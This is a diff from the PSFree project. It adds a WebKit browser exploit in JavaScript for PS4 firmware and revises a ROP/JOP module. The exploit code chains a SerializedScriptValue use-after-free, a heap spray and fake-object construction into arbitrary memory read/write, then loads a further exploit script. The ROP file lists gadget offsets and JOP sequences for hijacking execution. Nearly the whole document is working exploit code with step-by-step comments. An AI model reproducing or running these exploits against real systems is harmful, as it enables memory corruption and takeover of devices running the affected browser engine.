+            pop_promise2 = new Promise((resolve, reject) => {
+                resolves.push([resolve, reject]);
+                addEventListener('popstate', onpopstate, {once: true});
+                history.back();
+            });
+        }
+
+        if (no_pop) {
+            pop = event;
+        } else {
+            pop2 = event;
+        }
+        resolves[idx][0]();
+    }
+
+    const pop_promise = new Promise((resolve, reject) => {
+        resolves.push([resolve, reject]);
+        addEventListener('popstate', onpopstate, {once: true});
+    });
+
+    function onblur(event) {
+        const target = event.target;
+        const is_input = target === input;
+        const idx = is_input ? 0 : 1;
+        log(`${target.id} blur came`);
+
+        if (blurs[idx] > 0)  {
+            die(`${name}: multiple blurs. blurs: ${blurs[idx]}`);
+        }
+
+        // we replace the URL with the original so the user can rerun the
+        // exploit via a reload. If we don't, the exploit will append another
+        // "#foo" to the URL and the input element will not be blurred because
+        // the foo element won't be scrolled to during history.back()
+        history.replaceState('state3', '', original_loc);
+
+        // free the SerializedScriptValue's neighbors and thus free the
+        // SmallLine where it resides
+        const fset_idx = is_input ? index : index2;
+        for (let i = fset_idx - num_adjs/2; i < fset_idx + num_adjs/2; i++) {
+            fsets[i].rows = '';
+            fsets[i].cols = '';
+        }
+
+        for (let i = 0; i < num_reuses; i++) {
+            const view = new Uint8Array(new ArrayBuffer(ssv_len));
+            view[0] = 0x41;
+            views.push(view);
+        }
+
+        blurs[idx]++;
+    }
+
+    input.addEventListener('blur', onblur);
+    foo.addEventListener('blur', onblur);
+
+    document.body.append(input);
+    document.body.append(foo);
+    document.body.append(bar);
+
+    // FrameLoader::loadInSameDocument() calls Document::statePopped().
+    // statePopped() will defer firing of popstate until we're in the complete
+    // state
+    //
+    // this means that onblur() will run with "state2" as the current history
+    // item if we call loadInSameDocument too early
+    log(`readyState now: ${document.readyState}`);
+
+    if (document.readyState !== 'complete') {
+        await new Promise(resolve => {
+            document.addEventListener('readystatechange', function foo() {
+                if (document.readyState === 'complete') {
+                    document.removeEventListener('readystatechange', foo);
+                    resolve();
+                }
+            });
+        });
+    }
+
+    log(`readyState now: ${document.readyState}`);
+
+    await new Promise(resolve => {
+        input.addEventListener('focus', resolve, {once: true});
+        input.focus();
+    });
+
+    history.back();
+    await pop_promise;
+    await pop_promise2;
+
+    log('done await popstate');
+
+    input.remove();
+    foo.remove();
+    bar.remove();
+
+    const res = [];
+    for (let i = 0; i < views.length; i++) {
+        const view = views[i];
+        if (view[0] !== 0x41) {
+            log(`view index: ${hex(i)}`);
+            log('found view:');
+            log(view);
+
+            // set SSV's refcount to 1, all other fields to 0/NULL
+            view[0] = 1;
+            view.fill(0, 1);
+
+            if (res.length) {
+                res[1] = [new BufferView(view.buffer), pop2];
+                break;
+            }
+
+            // return without keeping any references to pop, making it GC-able.
+            // its WebCore::PopStateEvent will then be freed on its death
+            res[0] = new BufferView(view.buffer);
+            i = num_reuses - 1;
+        }
+    }
+
+    if (res.length !== 2) {
+        die('failed SerializedScriptValue UAF');
+    }
+    return res;
+}
+
+class Reader {
+    constructor(rstr, rstr_view) {
+        this.rstr = rstr;
+        this.rstr_view = rstr_view;
+        this.m_data = rstr_view.read64(off.strimpl_m_data);
+    }
+
+    read8_at(offset) {
+        return this.rstr.charCodeAt(offset);
+    }
+
+    read32_at(offset) {
+        const str = this.rstr;
+        return (
+            str.charCodeAt(offset)
+            | str.charCodeAt(offset + 1) << 8
+            | str.charCodeAt(offset + 2) << 16
+            | str.charCodeAt(offset + 3) << 24
+        ) >>> 0;
+    }
+
+    read64_at(offset) {
+        return sread64(this.rstr, offset);
+    }
+
+    read64(addr) {
+        this.rstr_view.write64(off.strimpl_m_data, addr);
+        return sread64(this.rstr, 0);
+    }
+
+    set_addr(addr) {
+        this.rstr_view.write64(off.strimpl_m_data, addr);
+    }
+
+    // remember to use this to fix up the StringImpl before freeing it
+    restore() {
+        this.rstr_view.write64(off.strimpl_m_data, this.m_data);
+        this.rstr_view.write32(off.strimpl_strlen, original_strlen);
+    }
+}
+
+// we now have a double free on the fastMalloc heap
+async function make_rdr(view) {
+    let str_wait = 0;
+    const strs = [];
+    const u32 = new Uint32Array(1);
+    const u8 = new Uint8Array(u32.buffer);
+    const marker_offset = original_strlen - 4;
+    const pad = 'B'.repeat(marker_offset);
+
+    log('start string spray');
+    while (true) {
+        for (let i = 0; i < num_strs; i++) {
+            u32[0] = i;
+            // on versions like 8.0x:
+            // * String.fromCharCode() won't create a 8-bit string. so we use
+            //   fromCodePoint() instead
+            // * Array.prototype.join() won't try to convert 16-bit strings to
+            //   8-bit
+            //
+            // given the restrictions above, we will ensure "str" is always a
+            // 8-bit string. you can check a WebKit source code (e.g. on 8.0x)
+            // to see that String.prototype.repeat() will create a 8-bit string
+            // if the repeated string's length is 1
+            //
+            // Array.prototype.join() calls JSC::JSStringJoiner::join(). it
+            // returns a plain JSString (not a JSRopeString). that means we
+            // have allocated a WTF::StringImpl with the proper size and whose
+            // string data is inlined
+            const str = [pad, String.fromCodePoint(...u8)].join('');
+            strs.push(str);
+        }
+
+        if (view.read32(off.strimpl_inline_str) === 0x42424242) {
+            view.write32(off.strimpl_strlen, 0xffffffff);
+            break;
+        }
+
+        strs.length = 0;
+        gc();
+        await sleep();
+        str_wait++;
+    }
+    log(`JSString reused memory at loop: ${str_wait}`);
+
+    const idx = view.read32(off.strimpl_inline_str + marker_offset);
+    log(`str index: ${hex(idx)}`);
+    log('view:');
+    log(view);
+
+    // versions like 8.0x have a JSC::JSString that have their own m_length
+    // field. strings consult that field instead of the m_length of their
+    // StringImpl
+    //
+    // we work around this by passing the string to Error.
+    // ErrorInstance::create() will then create a new JSString initialized from
+    // the StringImpl of the message argument
+    const rstr = Error(strs[idx]).message;
+    log(`str len: ${hex(rstr.length)}`);
+    if (rstr.length === 0xffffffff) {
+        log('confirmed correct leaked');
+        const addr = (
+            view.read64(off.strimpl_m_data)
+            .sub(off.strimpl_inline_str)
+        );
+        log(`view's buffer address: ${addr}`);
+        return new Reader(rstr, view);
+    }
+    die("JSString wasn't modified");
+}
+
+// we will create a JSC::CodeBlock whose m_constantRegisters is set to an array
+// of JSValues whose size is ssv_len. the undefined constant is automatically
+// added due to reasons such as "undefined is returned by default if the
+// function exits without returning anything"
+const cons_len = ssv_len - 8*5;
+const bt_offset = 0;
+const idx_offset = ssv_len - 8*3;
+const strs_offset = ssv_len - 8*2;
+const src_part = (() => {
+    // we user var instead of let/const since such variables always get
+    // initialized to the NULL JSValue even if you immediately return. we will
+    // make functions that do as little as possible in order to speed up the
+    // exploit. m_constantRegisters will still contain the unused constants
+    //
+    // function foo() {
+    //     return;
+    //     let a = 1;
+    // }
+    //
+    // the resulting bytecode:
+    // bb#1
+    // [   0] enter
+    // [   1] get_scope          loc4
+    // [   3] mov                loc5, loc4
+    // [   6] check_traps
+    // // this part still initializes a with the NULL JSValue
+    // [   7] mov                loc6, <JSValue()>(const0)
+    // [  10] ret                Undefined(const1)
+    // Successors: [ ]
+    //
+    // bb#2
+    // [  12] mov                loc6, Int32: 1(const2)
+    // [  15] ret                Undefined(const1)
+    // Successors: [ ]
+    //
+    //
+    // Constants:
+    //    k0 = <JSValue()>
+    //    k1 = Undefined
+    //    k2 = Int32: 1: in source as integer
+    let res = 'var f = 0x11223344;\n';
+    // make unique constants that won't collide with the possible marker values
+    for (let i = 0; i < cons_len; i += 8) {
+        res += `var a${i} = ${num_leaks + i};\n`;
+    }
+    return res;
+})();
+
+async function leak_code_block(reader, bt_size) {
+    const rdr = reader;
+    const bt = [];
+    // take into account the cell and indexing header of the immutable
+    // butterfly
+    for (let i = 0; i < bt_size - 0x10; i += 8) {
+        bt.push(i);
+    }
+
+    // cache the global variable resolution
+    const slen = ssv_len;
+
+    const bt_part = `var bt = [${bt}];\nreturn bt;\n`;
+    const part = bt_part + src_part;
+    const cache = [];
+    for (let i = 0; i < num_leaks; i++) {
+        cache.push(part + `var idx = ${i};\nidx\`foo\`;`);
+    }
+
+    const chunkSize = (is_ps4 && version < 0x900) ? 128 * KB : 1 * MB;
+    const smallPageSize = 4 * KB;
+    const search_addr = align(rdr.m_data, chunkSize);
+    log(`search addr: ${search_addr}`);
+
+    log(`func_src:\n${cache[0]}\nfunc_src end`);
+    log('start find CodeBlock');
+    let winning_off = null;
+    let winning_idx = null;
+    let winning_f = null;
+    let find_cb_loop = 0;
+    // false positives
+    let fp = 0;
+    rdr.set_addr(search_addr);
+    loop: while (true) {
+        const funcs = [];
+        for (let i = 0; i < num_leaks; i++) {
+            const f = Function(cache[i]);
+            // the first call allocates the CodeBlock
+            f();
+            funcs.push(f);
+        }
+
+        for (let p = 0; p < chunkSize; p += smallPageSize) {
+            for (let i = p; i < p + smallPageSize; i += slen) {
+                if (rdr.read32_at(i + 8) !== 0x11223344) {
+                    continue;
+                }
+
+                rdr.set_addr(rdr.read64_at(i + strs_offset));
+                const m_type = rdr.read8_at(5);
+                // make sure we're not reading the constant registers of an
+                // UnlinkedCodeBlock. those have JSTemplateObjectDescriptors.
+                // CodeBlock converts those to JSArrays
+                if (m_type !== 0) {
+                    rdr.set_addr(search_addr);
+                    winning_off = i;
+                    winning_idx = rdr.read32_at(i + idx_offset);
+                    winning_f = funcs[winning_idx];
+                    break loop;
+                }
+                rdr.set_addr(search_addr);
+                fp++;
+            }
+        }
+
+        find_cb_loop++;
+        gc();
+        await sleep();
+    }
+    log(`loop ${find_cb_loop} winning_off: ${hex(winning_off)}`);
+    log(`winning_idx: ${hex(winning_idx)} false positives: ${fp}`);
+
+    log('CodeBlock.m_constantRegisters.m_buffer:');
+    rdr.set_addr(search_addr.add(winning_off));
+    for (let i = 0; i < slen; i += 8) {
+        log(`${rdr.read64_at(i)} | ${hex(i)}`);
+    }
+
+    const bt_addr = rdr.read64_at(bt_offset);
+    const strs_addr = rdr.read64_at(strs_offset);
+    log(`immutable butterfly addr: ${bt_addr}`);
+    log(`string array passed to tag addr: ${strs_addr}`);
+
+    log('JSImmutableButterfly:');
+    rdr.set_addr(bt_addr);
+    for (let i = 0; i < bt_size; i += 8) {
+        log(`${rdr.read64_at(i)} | ${hex(i)}`);
+    }
+
+    log('string array:');
+    rdr.set_addr(strs_addr);
+    for (let i = 0; i < off.size_jsobj; i += 8) {
+        log(`${rdr.read64_at(i)} | ${hex(i)}`);
+    }
+
+    return [winning_f, bt_addr, strs_addr];
+}
+
+// data to write to the SerializedScriptValue
+//
+// setup to make deserialization create an ArrayBuffer with an arbitrary buffer
+// address
+function make_ssv_data(ssv_buf, view, view_p, addr, size) {
+    // sizeof JSC::ArrayBufferContents
+    const size_abc = (() => {
+        if (is_ps4) {
+            return version >= 0x900 ? 0x18 : 0x20;
+        } else {
+            return version >= 0x300 ? 0x18 : 0x20;
+        }
+    })();
+
+    const data_len = 9;
+    // sizeof WTF::Vector<T>
+    const size_vector = 0x10;
+
+    // SSV offsets
+    const off_m_data = 8;
+    const off_m_abc = 0x18;
+    // view offsets
+    const voff_vec_abc = 0; // Vector<ArrayBufferContents>
+    const voff_abc = voff_vec_abc + size_vector; // ArrayBufferContents
+    const voff_data = voff_abc + size_abc;
+
+    // WTF::Vector<unsigned char>
+    // write m_data
+    // m_buffer
+    ssv_buf.write64(off_m_data, view_p.add(voff_data));
+    // m_capacity
+    ssv_buf.write32(off_m_data + 8, data_len);
+    // m_size
+    ssv_buf.write64(off_m_data + 0xc, data_len);
+
+    // 6 is the serialization format version number for ps4 6.00. The format
+    // is backwards compatible and using a value less than the current version
+    // number used by a specific WebKit version is considered valid.
+    //
+    // See CloneDeserializer::isValid() from
+    // WebKit/Source/WebCore/bindings/js/SerializedScriptValue.cpp at PS4 8.0x.
+    const CurrentVersion = 6;
+    const ArrayBufferTransferTag = 23;
+    view.write32(voff_data, CurrentVersion);
+    view[voff_data + 4] = ArrayBufferTransferTag;
+    view.write32(voff_data + 5, 0);
+
+    // std::unique_ptr<WTF::Vector<JSC::ArrayBufferContents>>
+    // write m_arrayBufferContentsArray
+    ssv_buf.write64(off_m_abc, view_p.add(voff_vec_abc));
+    // write WTF::Vector<JSC::ArrayBufferContents>
+    view.write64(voff_vec_abc, view_p.add(voff_abc));
+    view.write32(voff_vec_abc + 8, 1);
+    view.write32(voff_vec_abc + 0xc, 1);
+
+    if (size_abc === 0x20) {
+        // m_destructor, offset 0, leave as 0
+        // m_shared, offset 8, leave as 0
+        // m_data
+        view.write64(voff_abc + 0x10, addr);
+        // m_sizeInBytes
+        view.write32(voff_abc + 0x18, size);
+    } else {
+        // m_data
+        view.write64(voff_abc + 0, addr);
+        // m_destructor (48 bits), offset 8, leave as 0
+        // m_shared (48 bits), offset 0xe, leave as 0
+        // m_sizeInBytes
+        view.write32(voff_abc + 0x14, size);
+    }
+}
+
+async function make_arw(reader, view2, pop) {
+    const rdr = reader;
+
+    // we have to align the fake object to atomSize (16) else the process
+    // crashes. we don't know why
+    //
+    // since cells (GC memory chunks) are always aligned to atomSize, there
+    // might be code that's assuming that all GC pointers are aligned
+    //
+    // see atomSize from WebKit/Source/JavaScriptCore/heap/MarkedBlock.h at
+    // PS4 8.0x
+    const fakeobj_off = 0x20;
+    const fakebt_base = fakeobj_off + off.size_jsobj;
+    // sizeof JSC::IndexingHeader
+    const indexingHeader_size = 8;
+    // sizeof JSC::ArrayStorage
+    const arrayStorage_size = 0x18;
+    // there's only the .raw property
+    const propertyStorage = 8;
+    const fakebt_off = fakebt_base + indexingHeader_size + propertyStorage;
+
+    log('STAGE: leak CodeBlock');
+    // has too be greater than 0x10. the size of JSImmutableButterfly
+    const bt_size = 0x10 + fakebt_off + arrayStorage_size;
+    const [func, bt_addr, strs_addr] = await leak_code_block(rdr, bt_size);
+
+    const view = rdr.rstr_view;
+    const view_p = rdr.m_data.sub(off.strimpl_inline_str);
+    const view_save = new Uint8Array(view);
+
+    view.fill(0);
+    make_ssv_data(view2, view, view_p, bt_addr, bt_size);
+
+    const bt = new BufferView(pop.state);
+    view.set(view_save);
+
+    log('ArrayBuffer pointing to JSImmutableButterfly:');
+    for (let i = 0; i < bt.byteLength; i += 8) {
+        log(`${bt.read64(i)} | ${hex(i)}`);
+    }
+
+    // the immutable butterfly's indexing type is ArrayWithInt32 so
+    // JSImmutableButterfly::visitChildren() won't ask the GC to scan its slots
+    // for JSObjects to recursively visit. this means that we can write
+    // anything to the the butterfly's data area without fear of a GC crash
+
+    const val_true = 7; // JSValue of "true"
+    const strs_cell = rdr.read64(strs_addr);
+
+    bt.write64(fakeobj_off, strs_cell);
+    bt.write64(fakeobj_off + off.js_butterfly, bt_addr.add(fakebt_off));
+
+    // since .raw is the first ever created property, it's just besides the
+    // indexing header
+    bt.write64(fakebt_off - 0x10, val_true);
+    // indexing header's publicLength and vectorLength
+    bt.write32(fakebt_off - 8, 1);
+    bt.write32(fakebt_off - 8 + 4, 1);
+
+    // custom ArrayStorage that allows read/write to index 0. we have to use an
+    // ArrayStorage because the structure assigned to the structure ID expects
+    // one so visitButterfly() will crash if we try to fake the object with a
+    // regular butterfly
+
+    // m_sparseMap
+    bt.write64(fakebt_off, 0);
+    // m_indexBias
+    bt.write32(fakebt_off + 8, 0);
+    // m_numValuesInVector
+    bt.write32(fakebt_off + 0xc, 1);
+
+    // m_vector[0]
+    bt.write64(fakebt_off + 0x10, val_true);
+
+    // immutable_butterfly[0] = fakeobj;
+    bt.write64(0x10, bt_addr.add(fakeobj_off));
+
+    const fake = func()[0];
+    log(`fake.raw: ${fake.raw}`);
+    log(`fake[0]: ${fake[0]}`);
+    log(`fake: [${fake}]`);
+
+    const test_val = 3;
+    log(`test setting fake[0] to ${test_val}`);
+    fake[0] = test_val;
+    if (fake[0] !== test_val) {
+        die(`unexpected fake[0]: ${fake[0]}`);
+    }
+
+    function addrof(obj) {
+        fake[0] = obj;
+        return bt.read64(fakebt_off + 0x10);
+    }
+
+    // m_mode = WastefulTypedArray, allocated buffer on the fastMalloc heap,
+    // unlike FastTypedArray, where the buffer is managed by the GC. This
+    // prevents random crashes.
+    //
+    // See JSGenericTypedArrayView<Adaptor>::visitChildren() from
+    // WebKit/Source/JavaScriptCore/runtime/JSGenericTypedArrayViewInlines.h at
+    // PS4 8.0x.
+    const worker = new DataView(new ArrayBuffer(1));
+    const main_template = new Uint32Array(new ArrayBuffer(off.size_view));
+
+    const leaker = {addr: null, 0: 0};
+
+    const worker_p = addrof(worker);
+    const main_p = addrof(main_template);
+    const leaker_p = addrof(leaker);
+
+    // we'll fake objects using a JSArrayBufferView whose m_mode is
+    // FastTypedArray. it's safe to use its buffer since it's GC-allocated. the
+    // current fastSizeLimit is 1000. if the length is less than or equal to
+    // that, we get a FastTypedArray
+    const scaled_sview = off.size_view / 4;
+    const faker = new Uint32Array(scaled_sview);
+    const faker_p = addrof(faker);
+    const faker_vector = rdr.read64(faker_p.add(off.view_m_vector));
+
+    const vector_idx = off.view_m_vector / 4;
+    const length_idx = off.view_m_length / 4;
+    const mode_idx = off.view_m_mode / 4;
+    const bt_idx = off.js_butterfly / 4;
+
+    // fake a Uint32Array using GC memory
+    faker[vector_idx] = worker_p.lo;
+    faker[vector_idx + 1] = worker_p.hi;
+    faker[length_idx] = scaled_sview;
+
+    rdr.set_addr(main_p);
+    faker[mode_idx] = rdr.read32_at(off.view_m_mode);
+    // JSCell
+    faker[0] = rdr.read32_at(0);
+    faker[1] = rdr.read32_at(4);
+    faker[bt_idx] = rdr.read32_at(off.js_butterfly);
+    faker[bt_idx + 1] = rdr.read32_at(off.js_butterfly + 4);
+
+    // fakeobj()
+    bt.write64(fakebt_off + 0x10, faker_vector);
+    const main = fake[0];
+
+    log('main (pointing to worker):');
+    for (let i = 0; i < off.size_view; i += 8) {
+        const idx = i / 4;
+        log(`${new Int(main[idx], main[idx + 1])} | ${hex(i)}`);
+    }
+
+    new Memory(
+        main, worker, leaker,
+        leaker_p.add(off.js_inline_prop),
+        rdr.read64(leaker_p.add(off.js_butterfly)),
+    );
+    log('achieved arbitrary r/w');
+
+    rdr.restore();
+    // set the refcount to a high value so we don't free the memory, view's
+    // death will already free it (a StringImpl is currently using the memory)
+    view.write32(0, -1);
+    // ditto (a SerializedScriptValue is currently using the memory)
+    view2.write32(0, -1);
+    // we don't want its death to call fastFree() on GC memory
+    make_arw._buffer = bt.buffer;
+}
+
+async function main() {
+    log('STAGE: UAF SSV');
+    const [fsets, indices] = prepare_uaf();
+    const [view, [view2, pop]] = await uaf_ssv(fsets, indices[1], indices[0]);
+
+    log('STAGE: get string relative read primitive');
+    const rdr = await make_rdr(view);
+
+    for (const fset of fsets) {
+        fset.rows = '';
+        fset.cols = '';
+    }
+
+    log('STAGE: achieve arbitrary read/write primitive');
+    await make_arw(rdr, view2, pop);
+
+    clear_log();
+    // path to your script that will use the exploit
+    import('./scripts/lapse.mjs');
+    //import('./rop/900_working.mjs');
+}
+main();
diff --git a/rop/800.mjs b/rop/800.mjs
index 0666856..8c24c60 100644
--- a/rop/800.mjs
+++ b/rop/800.mjs
@@ -1,4 +1,4 @@
-/* Copyright (C) 2023-2024 anonymous
+/* Copyright (C) 2023-2025 anonymous
 
 This file is part of PSFree.
 
@@ -15,113 +15,58 @@ GNU Affero General Public License for more details.
 You should have received a copy of the GNU Affero General Public License
 along with this program.  If not, see <https://www.gnu.org/licenses/>.  */
 
-import * as config from '../config.mjs';
-
-import { Int } from '../module/int64.mjs';
-import { debug_log, die } from '../module/utils.mjs';
-import { Addr, mem } from '../module/mem.mjs';
-import { KB, MB } from '../module/constants.mjs';
-import { ChainBase } from '../module/chain.mjs';
+import { mem } from '/module/mem.mjs';
+import { KB } from '/module/offset.mjs';
+import { ChainBase, get_gadget } from '/module/chain.mjs';
+import { BufferView } from '/module/rw.mjs';
 
 import {
-    make_buffer,
-    find_base,
     get_view_vector,
     resolve_import,
     init_syscall_array,
-} from '../module/memtools.mjs';
+} from '/module/memtools.mjs';
 
-import * as rw from '../module/rw.mjs';
-import * as o from '../module/offset.mjs';
-
-const origin = window.origin;
-const port = '8000';
-const url = `${origin}:${port}`;
-
-const syscall_array = [];
-
-const offset_textarea_impl = 0x18;
+import * as off from '/module/offset.mjs';
 
 // WebKit offsets of imported functions
 const offset_wk_stack_chk_fail = 0x8d8;
 const offset_wk_strlen = 0x918;
 
-// libSceLibcInternal offsets
-const offset_libc_setjmp = 0x258f4;
-const offset_libc_longjmp = 0x29c58;
-
-// see the disassembly of setjmp() from the dump of libSceLibcInternal.sprx
-//
-// int setjmp(jmp_buf)
-// noreturn longjmp(jmp_buf)
-//
-// This version of longjmp() does not take another argument to be used as
-// setjmp()'s return value. Offset 0 of the jmp_buf will be the restored
-// rax. Change it if you want a specific value from setjmp() after the
-// longjmp().
-const jmp_buf_size = 0xc8;
-let setjmp_addr = null;
-let longjmp_addr = null;
-
 // libSceNKWebKit.sprx
-let libwebkit_base = null;
+export let libwebkit_base = null;
 // libkernel_web.sprx
-let libkernel_base = null;
+export let libkernel_base = null;
 // libSceLibcInternal.sprx
-let libc_base = null;
-// kernel base address
-let kbase = null;
+export let libc_base = null;
 
-const kjop1 = `
-mov rdi, qword ptr [rdi]
-mov rax, qword ptr [rdi]
-jmp qword ptr [rax + 0xe0]
-`;
-const k2jop1 = `
+// gadgets for the JOP chain
+//
+// we'll use JSC::CustomGetterSetter.m_setter to redirect execution. its
+// type is PutPropertySlot::PutValueFunc
+const jop1 = `
 mov rdi, qword ptr [rsi + 8]
 mov rax, qword ptr [rdi]
 jmp qword ptr [rax + 0x70]
 `;
-// gadgets for the JOP chain
-//
-// When the scrollLeft getter native function is called on PS4 8.03, rsi is the
-// JS wrapper for the WebCore textarea class.
-const jop1 = `
-mov rdi, qword ptr [rsi + 0x20]
-mov rax, qword ptr [rdi]
-call qword ptr [rax + 0x28]
-`;
-// Since the method of code redirection we used is via redirecting a call to
-// jump to our JOP chain, we have the return address of the caller on entry.
-//
-// jop1 pushed another object (via the call instruction) but we want no extra
-// objects between the return address and the rbp that will be pushed by jop3
-// later. So we pop the return address pushed by jop1.
-//
-// This will make pivoting back easy, just "leave; ret".
-const jop2 = `
-pop rsi
-jmp qword ptr [rax + 0x5f]
-`;
 // rbp is now pushed, any extra objects pushed by the call instructions can be
 // ignored
-const jop3 = `
+const jop2 = `
 push rbp
 mov rbp, rsp
 mov rax, qword ptr [rdi]
 call qword ptr [rax + 0x30]
 `;
-const jop4 = `
-mov rdx, qword ptr [rax + 0x18]
-mov rax, qword ptr [rdi]
-call qword ptr [rax + 0x10]
+const jop3 = `
+mov rdx, qword ptr [rdx + 0x50]
+mov ecx, 0xa
+call qword ptr [rax + 0x40]
 `;
-const jop5 = `
+const jop4 = `
 push rdx
 mov edi, 0xac9784fe
 jmp qword ptr [rax]
 `;
-const jop6 = 'pop rsp; ret';
+const jop5 = 'pop rsp; ret';
 
 // the ps4 firmware is compiled to use rbp as a frame pointer
 //
@@ -135,13 +80,6 @@ const jop6 = 'pop rsp; ret';
 // leave instruction equivalent:
 //     mov rsp, rbp
 //     pop rbp
-const rop_epilogue = 'leave; ret';
-
-const push_rdx_jmp = `
-push rdx
-mov edi, 0xac9784fe
-jmp qword ptr [rax]
-`;
 
 const webkit_gadget_offsets = new Map(Object.entries({
     'pop rax; ret' : 0x0000000000035a1b,
@@ -166,66 +104,47 @@ const webkit_gadget_offsets = new Map(Object.entries({
 
     'ret' : 0x0000000000000032,
     'leave; ret' : 0x0000000000291fd7,
-    'leave; jmp rcx' : 0x000000000062a061,
 
-    'neg rax; and rax, rcx; ret' : 0x0000000000e85f24,
-    'adc esi, esi; ret' : 0x000000000088cbb9,
-    'add rax, rdx; ret' : 0x00000000003cd92c,
-    'add rcx, rsi; and rdx, rcx; or rax, rdx; ret' : 0x0000000000b8bc06,
-    'pop rdi; jmp qword ptr [rax + 0x50]' : 0x00000000021f9e8e,
-    'add rax, 8; ret': 0x0000000000468988,
-
-    'mov qword ptr [rdi], rsi; ret' : 0x0000000000034a40,
     'mov rax, qword ptr [rax]; ret' : 0x000000000002dc62,
     'mov qword ptr [rdi], rax; ret' : 0x000000000005b1bb,
     'mov dword ptr [rdi], eax; ret' : 0x000000000001f864,
-    'mov rdx, rcx; ret' : 0x0000000000eae9fd,
-    'mov qword ptr [rdx], rax; mov al, 1; ret' : 0x00000000000b6dcf,
-    'mov rdx, qword ptr [rcx]; ret' : 0x0000000000182bc4,
+    'mov dword ptr [rax], esi; ret' : 0x00000000002915bc,
 
-    'cli; jmp qword ptr [rax + 0x43]' : 0x0000000002163442,
-    'sti; ret' : 0x00000000004b94c8,
-    'xchg rbp, rax; ret' : 0x000000000218ef60,
-
-    [kjop1] : 0x00000000010da705,
-    [k2jop1] : 0x0000000001988320,
-
-    [push_rdx_jmp] : 0x00000000021af6ad,
-
-    [jop1] : 0x000000000057d568,
-    [jop2] : 0x0000000002198221,
-    [jop3] : 0x000000000076b970,
-    [jop4] : 0x0000000000202698,
-    [jop5] : 0x00000000021af6ad,
-    [jop6] : 0x00000000000bf669,
+    [jop1] : 0x0000000001988320,
+    [jop2] : 0x000000000076b970,
+    [jop3] : 0x0000000000f62f95,
+    [jop4] : 0x00000000021af6ad,
+    [jop5] : 0x00000000000bf669,
 }));
 
 const libc_gadget_offsets = new Map(Object.entries({
-    'neg rax; ret' : 0x00000000000d3503,
-    'mov rdx, rax; xor eax, eax; shl rdx, cl; ret' : 0x00000000000ce436,
-    'mov qword ptr [rsi], rcx; ret' : 0x00000000000cede2,
-    'setjmp' : offset_libc_setjmp,
-    'longjmp' : offset_libc_longjmp,
+    'getcontext' : 0x258f4,
+    'setcontext' : 0x29c58,
 }));
 
-const gadgets = new Map();
+const libkernel_gadget_offsets = new Map(Object.entries({
+    // returns the location of errno
+    '__error' : 0x160c0,
+}));
+
+export const gadgets = new Map();
 
 function get_bases() {
     const textarea = document.createElement('textarea');
-    const webcore_textarea = mem.addrof(textarea).readp(offset_textarea_impl);
+    const webcore_textarea = mem.addrof(textarea).readp(off.jsta_impl);
     const textarea_vtable = webcore_textarea.readp(0);
-    const libwebkit_base = find_base(textarea_vtable, true, true);
+    const off_ta_vt = 0x236d4a0;
+    const libwebkit_base = textarea_vtable.sub(off_ta_vt);
 
-    const stack_chk_fail_import =
-        libwebkit_base
-        .add(offset_wk_stack_chk_fail)
-    ;
+    const stack_chk_fail_import = libwebkit_base.add(offset_wk_stack_chk_fail);
     const stack_chk_fail_addr = resolve_import(stack_chk_fail_import);
-    const libkernel_base = find_base(stack_chk_fail_addr, true, true);
+    const off_scf = 0x12a30;
+    const libkernel_base = stack_chk_fail_addr.sub(off_scf);
 
     const strlen_import = libwebkit_base.add(offset_wk_strlen);
     const strlen_addr = resolve_import(strlen_import);
-    const libc_base = find_base(strlen_addr, true, true);
+    const off_strlen = 0x4eb80;
+    const libc_base = strlen_addr.sub(off_strlen);
 
     return [
         libwebkit_base,
@@ -234,232 +153,15 @@ function get_bases() {
     ];
 }
 
-function init_gadget_map(gadget_map, offset_map, base_addr) {
+export function init_gadget_map(gadget_map, offset_map, base_addr) {
     for (const [insn, offset] of offset_map) {
         gadget_map.set(insn, base_addr.add(offset));
     }
 }
 
 class Chain800Base extends ChainBase {
-    constructor() {
-        super();
-
-        // for conditional jumps
-        this._clean_branch_ctx();
-        this.flag = new Uint8Array(8);
-        this.flag_addr = get_view_vector(this.flag);
-        this.jmp_target = new Uint8Array(0x100);
-        rw.write64(this.jmp_target, 0x50, this.get_gadget(push_rdx_jmp));
-        rw.write64(this.jmp_target, 0, this.get_gadget('pop rsp; ret'));
-
-        // for save/restore
-        this.is_saved = false;
-        const jmp_buf_size = 0xc8;
-        this.jmp_buf = new Uint8Array(jmp_buf_size);
-        this.jmp_buf_p = get_view_vector(this.jmp_buf);
-    }
-
-    push_write64(addr, value) {
-        this.push_gadget('pop rdi; ret');
-        this.push_value(addr);
-        this.push_gadget('pop rsi; ret');
-        this.push_value(value);
-        this.push_gadget('mov qword ptr [rdi], rsi; ret');
-    }
-
-    // sequence to pivot back and return
     push_end() {
-        this.push_gadget(rop_epilogue);
-    }
-
-    check_is_branching() {
-        if (this.is_branch_ctx) {
-            throw Error('chain is still branching, end it before running');
-        }
-    }
-
-    push_value(value) {
-        super.push_value(value);
-
-        if (this.is_branch_ctx) {
-            this.branch_position += 8;
-        }
-    }
-
-    _clean_branch_ctx() {
-        this.is_branch_ctx = false;
-        this.branch_position = null;
-        this.delta_slot = null;
-        this.rsp_slot = null;
-        this.rsp_position = null;
-    }
-
-    clean() {
-        super.clean();
-        this._clean_branch_ctx();
-        this.is_saved = false;
-    }
-
-    // Use start_branch() and end_branch() to delimit a ROP chain that will
-    // conditionally execute. rax must be set accordingly before the branch.
-    // rax == 0 means execute the conditional chain.
-    //
-    // example that always execute the conditional chain:
-    //     chain.push_gadget('mov rax, 0; ret');
-    //     chain.start_branch();
-    //     chain.push_gadget('pop rbx; ret'); // always executed
-    //     chain.end_branch();
-    start_branch() {
-        if (this.is_branch_ctx) {
-            throw Error('chain already branching, end it first');
-        }
-
-        // clobbers rax, rcx, rdi, rsi
-        //
-        // u64 flag = 0 if -rax == 0 else 1
-        // *flag_addr = flag
-        this.push_gadget('pop rcx; ret');
-        this.push_constant(-1);
-        this.push_gadget('neg rax; ret');
-        this.push_gadget('pop rsi; ret');
-        this.push_constant(0);
-        this.push_gadget('adc esi, esi; ret');
-        this.push_gadget('pop rdi; ret');
-        this.push_value(this.flag_addr);
-        this.push_gadget('mov qword ptr [rdi], rsi; ret');
-
-        // clobbers rax, rcx, rdi
-        //
-        // rax = *flag_addr
-        // rcx = delta
-        // rax = -rax & rcx
-        // *flag_addr = rax
-        this.push_gadget('pop rax; ret');
-        this.push_value(this.flag_addr);
-        this.push_gadget('mov rax, qword ptr [rax]; ret');
-
-        // dummy value, overwritten later by end_branch()
-        this.push_gadget('pop rcx; ret');
